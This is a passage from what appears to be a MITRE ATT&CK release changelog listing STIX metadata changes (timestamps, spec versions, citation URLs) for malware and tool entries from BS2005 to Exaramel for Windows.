x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0014] BS2005
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-11-01 21:12:14.638000+00:00 | 2025-04-16 20:38:14.043000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0043] BUBBLEWRAP
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:03:26.307000+00:00 | 2025-04-16 20:37:56.566000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0638] Babuk
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-13 14:29:38.795000+00:00 | 2025-04-16 20:38:12.880000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0475] BackConfig
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 00:10:02.140000+00:00 | 2025-04-16 20:38:33.939000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0093] Backdoor.Oldrea
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-12 17:18:25.971000+00:00 | 2025-04-16 20:37:53.808000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0337] BadPatch
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-17 00:22:32.796000+00:00 | 2025-04-16 20:38:25.897000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0234] Bandook
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-11 19:42:14.066000+00:00 | 2025-04-16 20:38:20.706000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0239] Bankshot
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 20:41:17.223000+00:00 | 2025-04-16 20:37:57.714000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1068] BlackCat
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-06-15 18:33:45.154000+00:00 | 2025-04-16 20:38:07.230000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0564] BlackMould
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-03-23 22:18:00.145000+00:00 | 2025-04-16 20:38:13.187000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0486] Bonadan
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-08-10 19:17:14.766000+00:00 | 2025-04-16 20:38:06.109000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0635] BoomBox
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-01-18 18:10:37.673000+00:00 | 2025-04-16 20:38:34.236000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0651] BoxCaon
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 02:17:53.847000+00:00 | 2025-04-16 20:38:23.138000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0252] Brave Prince
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-11 21:44:52.220000+00:00 | 2025-04-16 20:37:59.301000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0204] Briba
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 14:56:14.671000+00:00 | 2024-11-17 19:55:07.590000+00:00 |
external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0482] Bundlore
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-02-10 15:37:37.795000+00:00 | 2025-04-16 20:38:18.925000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0025] CALENDAR
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:12:21.836000+00:00 | 2025-04-16 20:38:10.875000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0465] CARROTBALL
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-10 14:44:23.055000+00:00 | 2025-04-16 20:38:52.338000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0222] CCBkdr
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 20:01:55.457000+00:00 | 2025-04-16 20:38:30.519000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0023] CHOPSTICK
Current version: 2.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 17:51:20.403000+00:00 | 2024-11-17 14:43:38.592000+00:00 |
external_references[8]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
external_references[10]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
external_references[10]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0212] CORALDECK
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:13:24.829000+00:00 | 2024-11-17 15:01:33.390000+00:00 |
external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0137] CORESHELL
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 17:51:20.402000+00:00 | 2024-11-17 14:43:38.590000+00:00 |
external_references[3]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0527] CSPY Downloader
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-18 23:14:56.867000+00:00 | 2025-04-16 20:38:52.033000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0119] Cachedump
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:15:36.756000+00:00 | 2025-04-16 20:38:56.154000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0454] Cadelspy
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-29 13:13:22.064000+00:00 | 2025-04-16 20:38:29.046000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0274] Calisto
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-21 19:42:40.612000+00:00 | 2025-04-16 20:38:32.306000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0077] CallMe
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:16:18.880000+00:00 | 2025-04-16 20:38:35.526000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0351] Cannon
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:17:24.834000+00:00 | 2025-04-16 20:38:36.652000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0030] Carbanak
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-17 19:51:14.195000+00:00 | 2025-04-16 20:38:16.838000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0335] Carbon
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-25 15:46:06.354000+00:00 | 2025-04-16 20:38:31.987000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0261] Catchamas
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 14:51:14.620000+00:00 | 2024-11-17 18:36:16.203000+00:00 |
external_references[2]['description'] | Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018. | Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99 | https://web.archive.org/web/20190508165711/https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0572] Caterpillar WebShell
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-27 01:47:15.413000+00:00 | 2025-04-16 20:38:17.640000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0144] ChChes
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:32:28.615000+00:00 | 2024-11-17 16:46:57.582000+00:00 |
external_references[7]['description'] | Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017. | Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved November 17, 2024. |
external_references[7]['url'] | http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html | https://blogs.jpcert.or.jp/en/2017/02/chches-malware--93d6.html |
[S0631] Chaes
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-24 21:17:54.342000+00:00 | 2025-04-16 20:38:18.426000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0220] Chaos
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-01 18:30:55.286000+00:00 | 2025-04-16 20:38:11.037000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0674] CharmPower
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-01-25 15:43:34.231000+00:00 | 2025-04-16 20:38:18.570000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0107] Cherry Picker
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:20:05.298000+00:00 | 2025-04-16 20:38:30.864000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0660] Clambling
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-11-23 15:26:58.356000+00:00 | 2025-04-16 20:38:16.175000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0611] Clop
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 00:18:17.636000+00:00 | 2025-04-16 20:38:35.205000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0054] CloudDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:21:58.231000+00:00 | 2025-04-16 20:38:35.863000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0338] Cobian RAT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:22:42.218000+00:00 | 2025-04-16 20:38:29.365000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0369] CoinTicker
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:23:53.711000+00:00 | 2025-04-16 20:38:36.473000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0126] ComRAT
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 03:30:00.985000+00:00 | 2025-04-16 20:38:37.924000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0244] Comnie
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:25:11.871000+00:00 | 2025-04-16 20:38:43.241000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0608] Conficker
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-08 22:15:47.458000+00:00 | 2025-04-16 20:38:10.239000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0591] ConnectWise
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-13 13:09:38.786000+00:00 | 2025-04-16 20:38:53.716000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0575] Conti
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-09 18:13:14.416000+00:00 | 2025-04-16 20:38:06.412000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0492] CookieMiner
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 03:33:29.192000+00:00 | 2025-04-16 20:38:42.106000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0050] CosmicDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-28 21:32:37.171000+00:00 | 2025-04-16 20:38:00.812000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0614] CostaBricks
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-05 16:34:18.865000+00:00 | 2025-04-16 20:38:11.736000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1023] CreepyDrive
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-16 20:38:17.473000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1024] CreepySnail
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-08 20:18:47.253000+00:00 | 2025-04-16 20:38:36.803000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0115] Crimson
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 18:39:01.095000+00:00 | 2025-04-16 20:38:01.622000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0538] Crutch
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-12-22 21:35:01.766000+00:00 | 2025-04-16 20:38:23.296000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0498] Cryptoistic
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-08-18 15:36:30.748000+00:00 | 2025-04-16 20:38:27.529000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0625] Cuba
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-12 21:13:50.228000+00:00 | 2025-04-16 20:38:15.861000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0616] DEATHRANSOM
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 18:28:24.079000+00:00 | 2025-04-16 20:38:16.017000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0213] DOGCALL
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 02:37:34.915000+00:00 | 2024-11-17 15:01:33.385000+00:00 |
external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0694] DRATzarus
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-17 13:52:45.671000+00:00 | 2025-04-16 20:38:09.054000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0334] DarkComet
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-28 00:53:12.228000+00:00 | 2025-04-16 20:38:08.057000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1066] DarkTortilla
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-06 21:19:39.591000+00:00 | 2025-04-16 20:38:12.375000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0187] Daserf
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 02:04:21.751000+00:00 | 2025-04-16 20:38:31.680000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0243] DealersChoice
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:28:13.547000+00:00 | 2025-04-16 20:38:22.471000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0354] Denis
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 03:36:59.569000+00:00 | 2025-04-16 20:38:43.085000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0021] Derusbi
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 22:03:44.668000+00:00 | 2025-04-16 20:38:23.924000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0659] Diavol
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-04 20:15:22.258000+00:00 | 2024-11-17 20:10:33.591000+00:00 |
external_references[3]['description'] | FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved March 9, 2022. | FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.ic3.gov/Media/News/2022/220120.pdf | https://www.ic3.gov/CSA/2022/220120.pdf |
[S0200] Dipsind
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:30:14.126000+00:00 | 2025-04-16 20:38:39.512000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1021] DnsSystem
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-01 15:52:24.575000+00:00 | 2025-04-16 20:38:21.017000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0281] Dok
Current version: 2.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-12 11:26:16.316000+00:00 | 2024-11-17 17:15:10.558000+00:00 |
external_references[4]['description'] | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021. | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved November 17, 2024. |
external_references[4]['url'] | http://www.hexed.in/2019/07/osxdok-analysis.html | https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0600] Doki
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-19 17:45:07.102000+00:00 | 2025-04-16 20:38:06.758000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0695] Donut
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-18 15:31:34.662000+00:00 | 2025-04-16 20:38:54.932000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0186] DownPaper
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:31:30.330000+00:00 | 2025-04-16 20:38:40.332000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0134] Downdelph
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 15:32:15.795000+00:00 | 2025-04-16 20:37:53.960000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0384] Dridex
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-03 21:55:20.998000+00:00 | 2025-04-16 20:38:42.420000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0547] DropBook
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-18 23:44:04.697000+00:00 | 2025-04-16 20:38:03.046000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0502] Drovorub
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-09-18 20:55:03.153000+00:00 | 2025-04-16 20:38:25.508000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0567] Dtrack
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-18 22:01:45.646000+00:00 | 2025-04-16 20:38:44.292000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0038] Duqu
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-08 22:17:50.971000+00:00 | 2025-04-16 20:38:14.352000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0062] DustySky
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-27 19:53:40.705000+00:00 | 2025-04-16 20:38:14.194000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0024] Dyre
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-22 17:59:13.241000+00:00 | 2025-04-16 20:38:13.036000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0593] ECCENTRICBANDWAGON
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 17:28:32.335000+00:00 | 2025-04-16 20:38:41.289000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0605] EKANS
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-08 22:04:48.834000+00:00 | 2025-04-16 20:37:51.908000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0064] ELMER
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-26 23:33:26.355000+00:00 | 2025-04-16 20:38:03.197000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0568] EVILNUM
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-01-19 18:23:52.922000+00:00 | 2024-11-17 23:13:51.280000+00:00 |
external_references[3]['description'] | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021. | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.prevailion.com/phantom-in-the-command-shell-2/ | https://web.archive.org/web/20221209052853/https://www.prevailion.com/phantom-in-the-command-shell-2/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0624] Ecipekac
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-11 14:18:23.361000+00:00 | 2025-04-16 20:37:59.458000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0554] Egregor
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-14 21:39:11.008000+00:00 | 2025-04-16 20:38:36.019000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0081] Elise
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 02:35:48.740000+00:00 | 2025-04-02 20:34:59.728000+00:00 |
description | [Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018) | [Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018) |
external_references[4]['description'] | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018. | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf | https://web.archive.org/web/20190508165226/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf |
[S0082] Emissary
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 02:35:14.040000+00:00 | 2025-04-02 20:35:25.274000+00:00 |
description | [Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015) | [Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio.(Citation: Lotus Blossom Dec 2015) |
[S0091] Epic
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-26 14:33:46.159000+00:00 | 2025-04-16 20:38:15.497000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0152] EvilGrab
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-23 15:14:18.597000+00:00 | 2025-04-16 20:38:00.969000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0343] Exaramel for Windows
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
